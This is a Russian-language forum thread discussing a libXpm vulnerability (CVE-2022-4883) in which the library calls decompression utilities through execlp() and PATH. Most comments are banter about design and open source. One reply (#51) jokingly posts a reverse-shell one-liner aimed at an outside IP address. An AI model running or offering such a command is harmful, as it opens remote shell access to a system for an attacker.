The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы
правила/FAQ
поиск
регистрация
вход/выход
слежка
RSS


"Уязвимость в libXpm, приводящая к выполнению кода"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от opennews (??), 21-Янв-23, 11:12 
Опубликован корректирующий выпуск библиотеки libXpm 3.5.15, развиваемой проектом X.Org и применяемой для обработки файлов в формате XPM. В новой версии устранены три уязвимости, две из которых (CVE-2022-46285, CVE-2022-44617) приводят к зацикливанию при обработке специально оформленных файлов XPM. Третья уязвимость (CVE-2022-4883) позволяет запустить произвольные команды при выполнении приложений, использующих libXpm. При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=58524

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 21-Янв-23, 11:12   +2 +/
> При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

Это кто такой умный ставит левым прогам суид-рут?!

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #4, #49

2. Сообщение от Аноним (1), 21-Янв-23, 11:13   +6 +/
> Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов

Ну а это вообще жесть :)

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #3, #11

3. Сообщение от Аноним (3), 21-Янв-23, 12:01   +3 +/
По сути, не отличается от подмены утилиты или библиотеки на левую. Вы обречены.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #19

4. Сообщение от Аноним (4), 21-Янв-23, 12:07   +/
Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #18, #80

5. Сообщение от Аноним (5), 21-Янв-23, 12:11   –7 +/
Ядро - одна большая чёрная дырка. Остальные проги тоже, даже sudo который со времён мамонтов, дырявый до сих пор. ОпенБСД занесли за бэкдоры и дырки, тоже не секрет и очень давно уже.

Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь что wine хоть работает, и то слава богу, ну хоть одна хорошая новость. Как жить то теперь?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #6, #9, #10, #15, #65, #82

6. Сообщение от Аноним (6), 21-Янв-23, 12:22   +/
Без таких нытиков как ты - нормально жить
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

9. Сообщение от деанон (?), 21-Янв-23, 12:39   +4 +/
Зуммер узнал, что мир не идеален
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #12

10. Сообщение от Аноним (10), 21-Янв-23, 12:41   +/
Хорошо жить на Винде 11
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #13

11. Сообщение от An onymous (?), 21-Янв-23, 12:43   +5 +/
warning! Пользователь может запустить под собой какую-то программу!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #40

12. Сообщение от Аноним (5), 21-Янв-23, 12:50   –1 +/
Да откудаж вы рождаетесь то инородные такие, что аж каждый вдох и выдох это уже полноценный вывод.
Кто-то прав, вас уже многова-то..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

13. Сообщение от Анатолий Цыбин (ok), 21-Янв-23, 12:52   +/
Естественно, ведь на Винде нет дыр. Весь мир знает, что Майкрософт -- это фирма от самого бога, в которой работают трудолюбивейшие как Стаханов и умнейшие как Эйнштейн специалисты. Они любят пользователя и заботятся о нём, поэтому не допущают никаких дыр, никаких уязвимостей в принципе.
Те, кто попадают в рай, являются свидетелями того, что у самого бога стоит Винда.
А кто попадает в ад... Ну, не будем о плохом. =)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #35

14. Сообщение от Ананоним (?), 21-Янв-23, 13:08   +/
Ну они скоро подарят всяким докерам фичу невозможности пользователю менять переменную PATH. Скажите переменным окружения прощай! Депрекатед!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #20

15. Сообщение от Аноним (15), 21-Янв-23, 13:12   +/
А в стенах камеры ещё.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

16. Сообщение от InuYasha (??), 21-Янв-23, 13:25   +/
> при помощи вызова execlp() запускает внешние утилиты

Ну это вообще... смузикод из 80ых что-ли? system("gzip my shit"); А всё потому что нет нормального LinAPI?

Если кто будет возмущаться, я тоже делал exec для всяких костылей, и знаю, что иногда надо, но это грязный хак, и не в проде же )

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #21

17. Сообщение от InuYasha (??), 21-Янв-23, 13:30   +/
Гос.пади, xpm - это битмапы в формате сишного массива что-ли? JSON и смузихлёбство из прошлого века? Всю жизнь его ненавидел. Зато проприетарасты его обожают.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #22, #23

18. Сообщение от Аноним (1), 21-Янв-23, 14:12   +2 +/
И много у тебя троянов внутри суидных прог?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

19. Сообщение от Аноним (1), 21-Янв-23, 14:14   –1 +/
> не отличается от подмены утилиты или библиотеки на левую

Вот с этого и надо было статью начинать: "сначала надо подменить систему".

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

20. Сообщение от Аноним (1), 21-Янв-23, 14:17   +3 +/
Да пусть меняет PATH, сколько влезет. Вопрос в другом: какого фига разрешено недоверенному юзеру запускать что-то оттуда, куда он имеет права на запись? Админ локалхоста забыл про noexec?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14 Ответы: #33

21. Сообщение от Аноним (21), 21-Янв-23, 14:19   +/
> А всё потому что нет нормального LinAPI?

А как ты себе это представляешь в принципе? Абсолютно все утилиты на компе должны идти с lib<util_name>.so и каждая утилита должна линковаться с каждой библиотекой другой утилиты?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #27, #29, #45, #70

22. Сообщение от Аноним (21), 21-Янв-23, 14:20   +/
И я его обожаю. В CDE божественные xpm'ные иконки
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #92

23. Сообщение от Аноним (1), 21-Янв-23, 14:24   +2 +/
Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo ls сделаешь (это так, для наглядности, про что "уязвимость").
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #26

24. Сообщение от Аноним (40), 21-Янв-23, 14:42   –2 +/
>Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip)

Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #32, #48, #66, #106

25. Сообщение от Аноним (25), 21-Янв-23, 14:44   –2 +/
>запускает внешние утилиты распаковки (uncompress или gunzip)

Вон из профессии за такое решение.

>Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам

Вон из профессии за такой фикс.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #36, #68

26. Сообщение от InuYasha (??), 21-Янв-23, 14:51   +/
Да это-то понятно. Просто вспомнил, что xpm такое. Пока у тебя диск завален xpm-ками - это всё смешно, а, вот, когда у тебя бинарники со вSHITыми в виде данных (а не, хотя бы, ресурсов) картинками - вообще грусть. Особенно если это прошивки какие-нибудь.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #23

27. Сообщение от Аноним (40), 21-Янв-23, 14:52   +/
В Винде можно dll связать с другой dll.
В java можно динамически загружать нативные библиотеки.
Почему в libxpm нельзя как то так?

Или просто скопипастить код распаковки в исходный код lixpm и не запускать неизвестно какие исполняемые файлы

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21 Ответы: #53, #57, #63, #71

29. Сообщение от InuYasha (??), 21-Янв-23, 14:55   +/
В идеальном мире - примерно да. Функции, алгоритмы, код - в ДЛЛках, CLI и фронтенд - на чём хочешь. А если вспомнить rundll32, то, с натяжкой, КЛИ у нас уже готов... )
Конкретно по сабжу - я реально удивлён что там не подключили какую-нибудь библиотеку.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

30. Сообщение от Омномним (?), 21-Янв-23, 15:03   +2 +/
при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки

А libz поюзать вообще не судьба была?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #34

32. Сообщение от Аноним (40), 21-Янв-23, 15:07   +/
Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, который в прод работает.
Но там ни путь ни параметры от пользователя не приходят.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24

33. Сообщение от Омномним (?), 21-Янв-23, 15:07   +/
Да не, ну это херня, у меня другой вопрос: каким образом этот юзер себе suid root-то организует?
А так - ну запускает непривилигерованный юзер что-то, в чём проблема-то? :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #41

34. Сообщение от Аноним (34), 21-Янв-23, 15:11   +/
Ну, тогда бы сейчас бы читали новость об очередном переполнении int и выходы за пределы буфера.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #30 Ответы: #37, #112

35. Сообщение от Аноним (35), 21-Янв-23, 15:14   +3 +/
Ну не просто же так в линуксе демоны
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #13 Ответы: #46

36. Сообщение от Аноним (36), 21-Янв-23, 15:28   +/
А если бы они использовали другой язык проблем было бы ещё больше. В том числе с программистами и их решениями.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #39

37. Сообщение от Аноним (36), 21-Янв-23, 15:29   +/
Выходить? Не надо так.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34

38. Сообщение от Анонн (?), 21-Янв-23, 16:15   +2 +/
Офигенный код и офигенный фикс...
Кто там пыхеров и жсников за eval ругал? Ваш выход!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #44

39. Сообщение от Аноним (39), 21-Янв-23, 16:27   –1 +/
Какой нахрен другой язык, им дали zlib - нет "хочу дёргать exec". Необучаемые.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36 Ответы: #75

40. Сообщение от Аноним (40), 21-Янв-23, 16:34   +1 +/
Warning. Программа с suid бит может запустить под root какую-то программу вместо gzip
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11 Ответы: #47

41. Сообщение от GOrilla (?), 21-Янв-23, 16:42   +1 +/
Как это в чем? А эксплоит запускает тогда что. Шелл хостинги не дают запускать из хоумов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33

43. Сообщение от Аноним (44), 21-Янв-23, 17:09   +/
А ведь можно было использовать библиотеки реализующие декомпрессию z/gz и не вызывать в коде библиотеки (библиотеки!!) внешние исполняемые файлы.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #60

44. Сообщение от Аноним (44), 21-Янв-23, 17:12   +1 +/
В это проблема GNU/Xorg библиотек. Десятки тысяч исходных кодов, которые не верифицировались и не обновлялись на протяжении, например 11 лет! 20 лет! да там есть и такое.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #97, #105

45. Сообщение от Аноним (45), 21-Янв-23, 17:13   +/
В данном случае распаковка не является задачей libXpm. Программа может напрямую вызвать zlib, и разжатые данные передать libXpm
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

46. Сообщение от Admino (ok), 21-Янв-23, 17:59   +4 +/
И зомби.

И в винде иконки и службы.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35

47. Сообщение от Admino (ok), 21-Янв-23, 18:00   +/
А что за программа-то?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #51

48. Сообщение от Аноним (21), 21-Янв-23, 18:05   +/
> Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

А что не так? У вас там в расте особенности работы с памятью, а у нас особенность работы с libXpm

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24

49. Сообщение от dannyD (?), 21-Янв-23, 18:19   +1 +/
>>Это кто такой умный ставит левым прогам суид-рут?!

а спроси.

ни кто не заметил, что даже если дать
~/.local/share/TelegramDesktop/log.txt root ro, то всё равно он переписывается ?

т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

вот меня это как-то напрягает.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #55, #64

51. Сообщение от OpenEcho (?), 21-Янв-23, 18:36   +/
> А что за программа-то?

    bash -i >& /dev/udp/1.2.3.4/1337 0>&1

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47 Ответы: #54

53. Сообщение от Аноним (21), 21-Янв-23, 19:14   +1 +/
> В java можно динамически загружать нативные библиотеки.

Офигеть, вот это круто! Это dlopen() что-ли?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27 Ответы: #95

54. Сообщение от Admino (ok), 21-Янв-23, 19:38   +/
С правами рута и с использованием libXpm?

Отсыпь.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51 Ответы: #108

55. Сообщение от Аноним (1), 21-Янв-23, 19:57   +2 +/
Потому что ты ничего не понимаешь. Права на каталог TelegramDesktop - чьи? Вот чьи права - тот и может удалять-добавлять файлы в этом каталоге. Что такое "переписать"? Старый файл - удаляется, новый - создаётся, обе операции зависят от прав на _каталог_.

Тебе нужен "закрепляющий бит": каталог с установленным sticky-битом означает, что удалить файл из этого каталога может только владелец файла или root. Не забывай, если выше ещё есть каталоги.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #56, #79

56. Сообщение от dannyD (?), 21-Янв-23, 20:23   +/
спс

зы. я не админ, я оффтоп не люблю.
ззы. совсем не люблю.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55

57. Сообщение от Sw00p aka Jerom (?), 21-Янв-23, 20:38   +1 +/
ну вон в винде дллки также инжектят разница-то в чем?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

60. Сообщение от Аноним (3), 21-Янв-23, 21:10   +2 +/
Юникс вэй. Утилита > утилита > утилита.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #72

61. Сообщение от Аноним (-), 21-Янв-23, 22:11   +/
Блеск и нищета опенсорса.

Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

А потом оказывается что пол инета зависит от стремной либы, автор которой давно на нее забил, которая никогда не ревьювилась и не обновлялась уже годы...

Колосс на глиняных ногах!

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #62, #85, #98

62. Сообщение от Аноним (62), 21-Янв-23, 22:17   +1 +/
Зато в ынтерпрайзе всё не так. Сеньёры молятся на новые версии библиотек и дают по рукам джунам, которые делают свои! :D
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61 Ответы: #67

63. Сообщение от Аноним (63), 21-Янв-23, 22:34   +/
Потому что unix это не винда
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

64. Сообщение от Аноним (-), 21-Янв-23, 22:37   +1 +/
> т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

А owner у него кто?

> вот меня это как-то напрягает.

Chattr +i ему поставь. Или если не хочется чтобы там что-то было, можно убрать файло, создать диру с этим именем, и если программа в принципе может после этого работать - ну, ой, в диру дописать что либо она уже не сможет. Получит "Is a directory" как отлуп.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #101

65. Сообщение от Аноним (-), 21-Янв-23, 22:39   +/
> Ядро - одна большая чёрная дырка.

Ога, блин, выполняет запросы программ, такое сякое. Если запросы программ не выполнять - знаете как хакеры обломаются?! Кстати это работает. Скажем, у меня есть библа которая заворачивает попытки файлы открывать. Программы очень прикольно обижаются когда им почти ничего открыть не дают. Правда далеко не все их них потом работать согласны.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

66. Сообщение от Аноним (63), 21-Янв-23, 22:40   +/
> Очень хорошая архитектура

Верно, классическая UNIX, позволяет менять алгоритм сжатия без изменения кода приложения и перекомпиляции.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24 Ответы: #94

67. Сообщение от Аноним (-), 21-Янв-23, 22:40   –2 +/
В ынтерплайзе никто не будет писать либу просто так. По крайней мере в рабочее время.

Еще забыл про основной аргумент за опенсорс - бесплатность.

Спросишь 'Чем этот фоторедактор лучше чем стандарт индустрии?'
- 'Он же бесплатный!' ответят тебе.
- 'Но он же кривой, косой и багованый!'
- 'Зато бесплатный!'
Ох, это сладкое слово халява!

Те кто будут писать что проприетарный софт тоже ничего не должен - вы явно не доросли до SLA)))

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62 Ответы: #69, #76, #78, #83, #84, #87, #102

68. Сообщение от Аноним (63), 21-Янв-23, 22:41   +/
Давай tar ещё выгони, дурик.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #96

69. Сообщение от Аноним (63), 21-Янв-23, 22:42   +/
Свободный и бесплатный это разные вещи.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67 Ответы: #73, #74

70. Сообщение от Аноним (70), 21-Янв-23, 22:45   +2 +/
В полноценных операционных системах еще с 90х годов у каждой программы нужные библиотеки лежат в каталоге с этой самой программой и только общесистемные лежат в каталоге операционной системы, где-нибудь в C:\OS2\DLL или C:\Windows\System32.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

71. Сообщение от Аноним (-), 21-Янв-23, 22:47   +/
> В Винде можно dll связать с другой dll.

В Linux тоже так можно. И чего?

> В java можно динамически загружать нативные библиотеки.

Да охренеть! В нативных программах, только подумайте, тоже.

> Почему в libxpm нельзя как то так?

При желании можно. Просто видимо авторы были ленивые и это показалось им сложнее чем вон то. А чо, в винде тоже можно CreateProcess* сделать из либы если захотеть.

> Или просто скопипастить код распаковки в исходный код lixpm и не запускать
> неизвестно какие исполняемые файлы

Справедливости ради - найти программу которую еще и огреть вон тем удастся придется постараться.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

72. Сообщение от Аноним (70), 21-Янв-23, 22:47   +1 +/
Утилита > утилита > утилита > You're pwned
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60

73. Сообщение от Аноним (-), 21-Янв-23, 22:59   +/
А я и не утверждал, что это одинаковые вещи.
Просто настоящих идейных крайне мало, но они хоть вызывают уважение.

Но большинство пользователей опенсорца интересует только аспект бесплатности.
Они просто качают ибо халява, крайне редко куда-то донатят и еще реже делают вклад написание кода/ревью/тестированием/дизайном. Подавляющему большинству даже лень багрепорты отправлять.

И единственный их вклад в развитие опенсорс - рассказать другу 'о, я тут беспланую аппу скачал!'

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69

74. Сообщение от Аноним (-), 21-Янв-23, 23:09   +1 +/
Это же все видно.
Посмотрите сколько пользователей у того же firefox, и сколько у них было донатов от 'физлиц' И заодно кол-во контрибьюторов в их репы.
Или у LibreOffice? Или GIMP?
Каждый сотый? Каждый тысячный? Или все еще хуже?

Людям как-то объяснили про бесплатность опенсорса, а про то что за свободу нужно платить - нет.

В итоге развивается только во что вложились корпорации. А пользователи ноют 'праклятые карпарасты испортили мой опенсорс'
Да он никогда их и не был!

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69 Ответы: #86, #93

75. Сообщение от Аноним (75), 21-Янв-23, 23:34   +/
Положить zlib.so в PATH. Повторить эксперимент
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39 Ответы: #77

76. Сообщение от Аноним (3), 21-Янв-23, 23:35   +/
> никто не будет писать либу просто так

дык за деньги же

в отечественном ынтерпрайзе токо и делают, что используют бесплатные либы. а кто считает, что это не так, тот явно не дорос

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

77. Сообщение от Аноним (21), 21-Янв-23, 23:36   +1 +/
ldconfig использует $PATH?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #75

78. Сообщение от Аноним (78), 21-Янв-23, 23:46   +2 +/
>В ынтерплайзе никто не будет писать либу просто так

АХАХАХАХА

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

79. Сообщение от dannyD (?), 22-Янв-23, 00:31   +1 +/
>>Потому что ты ничего не понимаешь.....
>>...нужен "закрепляющий бит": каталог с установленным sticky-битом означает,

а можно чиста каннеретна \../_ _\../

что сделать, чтоб в файле нулевой длины ~/.local/share/TelegramDesktop/log.txt

запускаемая программа (телеграм) ничего не могла записать или измемить?
т.е. задача блокировать ведение этого лога.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55 Ответы: #100, #115, #119

80. Сообщение от Аноним (-), 22-Янв-23, 00:33   +/
> Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.

Вот в какой suid'ной программе она могла бы потребоваться? Даже если забыть о том что в линухе suid уже довольно давно считается "фи" и почти не используется.


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #103

82. Сообщение от Аноним (-), 22-Янв-23, 00:39   +/
> Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь
> что wine хоть работает, и то слава богу,

Так что можно позапускать и виндовые трояны милые сердцу прожженого маздайца? Тут уж кому что.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

83. Сообщение от Аноним (-), 22-Янв-23, 00:41   +/
> Те кто будут писать что проприетарный софт тоже ничего не должен -
> вы явно не доросли до SLA)))

Однако в лицензиях проприетарного софта почему-то написано про AS IS. Да, некоторые еще и читают это.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

84. Сообщение от Аноним (1), 22-Янв-23, 00:50   +/
> В ынтерплайзе никто не будет писать либу просто так

То-то у "ынтерплайза" сейчас версионная диарея.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

85. Сообщение от Аноним (34), 22-Янв-23, 01:42   +1 +/
> Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

Святая наивность, ты никогда не видел коммерческой разработки изнутри.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61

86. Сообщение от Бывалый смузихлёб (?), 22-Янв-23, 05:26   +/
> за свободу нужно платить - нет

Свобода, за которую надо платить - это платная временная вольная от хозяина

По корпорациям и прочему - почему-то тот же опенсорс и его адептов вовсе не смущает, что абсолютное большинство на его благо трудится за доброе слово даже без прав на собственный код( а то и за пинок под жО за несоблюдение кок’ов )

Что вовсе не мешает руководству тех структур за счёт добровольных пожертвований платить самим себе зарплату и почти непрерывно кататься по всему миру и закатывать балы-пиры разумеется в рамках популяризации попенсорса вместо денежной поддержки участников.
Даже не зарплатных а хотя бы уровня выплаты за годную фичу. Даже полтишок - мелочь, а приятно.

В общем, уверен ли анон-знаток-всего-на-свете, что донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам ?
Ну, чтобы иметь хоть какое-то минимальное право требовать денег за фичи

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74 Ответы: #90, #91

87. Сообщение от Бывалый смузихлёб (?), 22-Янв-23, 05:31   +/
> В ынтерплайзе никто не будет писать либу просто так.
> По крайней мере в рабочее время.

Ну почему же, вполне будет.
Только если это не согласовано с конторой, либо будут разборки о том кому код принадлежит, либо - сколько штрафа должен заплатить сотрудник за неисполнение обязанностей( т.е что на работе занимался не работой а черти чем, но зарплату ему платили будто бы он работал )

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

88. Сообщение от Alex (??), 22-Янв-23, 06:13   –1 +/
Странно, что не написали сколько лет этой уязвимости....
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #89, #104

89. Сообщение от Аноним (-), 22-Янв-23, 08:11   +/
Или им было стыдно это писать,
или все кто знал уже ущли на пенсию.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88

90. Сообщение от Аноним (-), 22-Янв-23, 09:16   +/
> абсолютное большинство на его благо трудится за доброе слово

А потому что это не правда.

'The number of unpaid developers may be stabilizing, with these developers contributing 8.2% of contributions'
Источник: Annual Kernel Development Report
2017.
Это при том что в 2014 было 11.8%. А после ковида думаю их стало еще меньше, но цифры искать лень.

Т.е. абсолютное большинство трудится за хрустящую бумажку корпораций, а не за доброе слово.
И делать они будут то что им скажет корпоративный менеджер (за редким исключением супер крутых и распиаренных чуваков)

Более того, если глянуть другие отчеты, то там тоже куча всего интересного.
Напр. из '2022 Linux Foundation Annual Report' секция MENTORSHIP
- 70% чуваков из Индии
- 62% чуваков с не законченным колледжом и 23% с законченным
- High school или master degree есть только у 7.6% и 4.1% соответственно
- 52.9% это lower middle class (которые скорее всего надеятся найти работу в каком-то intel/ibm/redhat...)
В это будущее линукса)))

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86

91. Сообщение от Аноним (-), 22-Янв-23, 09:28   +/
> платить самим себе зарплату

А потому что они копируют корпоративную структуру от которой и получают деньги.
Поэтому и какая-то глава мозилы выплачивала себе миллионы баксов, прям как в фирмах выплачивают золотые парашюты.

Но нас вроде это парить не должно, это ж практические все деньги гугла?

> донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам

Разумеется я этого не могу гарантировать. Более того, сейчас, думаю, они будут просыраться на банкеты и всякое дайверсити.

Просто обычные пользователи уже проиграли. Опенсорс нашел свой путь развития в видеслияния с корпами и будет отрабатывать их хотелки.
А пользователи могут только ныть на форумах про очередной системД, никак не влияя на направление развития продукта.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86

92. Сообщение от Аноним (92), 22-Янв-23, 09:47   +/
А если бы они были png'шные, было бы не то?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22 Ответы: #99

93. Сообщение от Аноним (92), 22-Янв-23, 09:50   +/
Раньше на сайте Криты писалась сумма пожертвований. Потом вроде убрали, чтобы не позориться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74

94. Сообщение от Аноним (10), 22-Янв-23, 10:36   +/
Менять алгоритм сжатия на запуск произвольного кода?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #66

95. Сообщение от Аноним (10), 22-Янв-23, 10:40   +/
System.loadLibrary
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53

96. Сообщение от Аноним (96), 22-Янв-23, 10:47   +/
tar давно ффтопку, ибо его разрабы не понимают в архитектуре и делали его абы-как и в результате он выглядит как неудобное в использовании нагромождение говна. Рано или поздно всё это говно придётся разгребать и делать по-человечески. Только почему опять мне?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68

97. Сообщение от Аноним (96), 22-Янв-23, 10:48   +/
У вейланда другая проблема - падает и глючит.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

98. Сообщение от Аноним (96), 22-Янв-23, 12:01   +/
https://xkcd.com/2347/
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61

99. Сообщение от Аноним (21), 22-Янв-23, 13:32   +2 +/
ощущения не те
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92

100. Сообщение от Perlovka (ok), 22-Янв-23, 13:40   +1 +/
Гугли setattr
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79

101. Сообщение от dannyD (?), 22-Янв-23, 14:08   +/
спс, разорбрался.

конкретно телеграмм отказывается запускаться с отбитым логом.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #107, #114

102. Сообщение от хрю (?), 22-Янв-23, 14:23   +2 +/
>>В ынтерплайзе никто не будет писать либу просто так.

:D :D :D :D :D Не реально смешно. Чел никогда не видел ынтерплайза? Зачастую, он чуть меньше чем полностью состоит из 7 колёсных велосипедов.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

103. Сообщение от Аноним (103), 22-Янв-23, 16:06   +/
Ну "почти" не почти, беру первый попавшийся сервер со свежайшим RHEL 9 и все еще вижу сьюды в рута в программах, которые используются постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab, su, passwd/gpasswd, fusermount. Впрочем, полагаю что CAP_SETUID, позволяющий сменить uid на рута, это настолько сильная операция, что тут безопасности от отказа от сьюд почти и не будет (хотя какие-то эксплоиты, наверное, предотвратить можно).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80 Ответы: #113

104. Сообщение от Аноним (1), 23-Янв-23, 00:15   +1 +/
замена системных экзешников на троянов? Да постарше тебя уж.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88

105. Сообщение от Аноним (105), 23-Янв-23, 13:08   +/
>GNU/Xorg

Конечно, FSF был бы не против этого.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

106. Сообщение от kusb (?), 23-Янв-23, 14:43   +/
Может быть истинно понятная и безопасная ОС и должна так работать, без всяких шуток.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24

107. Сообщение от ivan_erohin (?), 23-Янв-23, 17:15   +1 +/
очень, очень наглый кусок дуровкода.
а если залинковать это в /dev/null:
$ rm -f -- ~/.local/share/TelegramDesktop/log.txt
$ ln -s ~/.local/share/TelegramDesktop/log.txt /dev/null
(и/или то же самое после запуска дуровграма)
что будет ?

ps: man socat вдруг появятся еще идеи.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #101 Ответы: #110, #111

108. Сообщение от OpenEcho (?), 23-Янв-23, 19:35   +/
> Отсыпь.

Но, тебе уже и так хватит :)

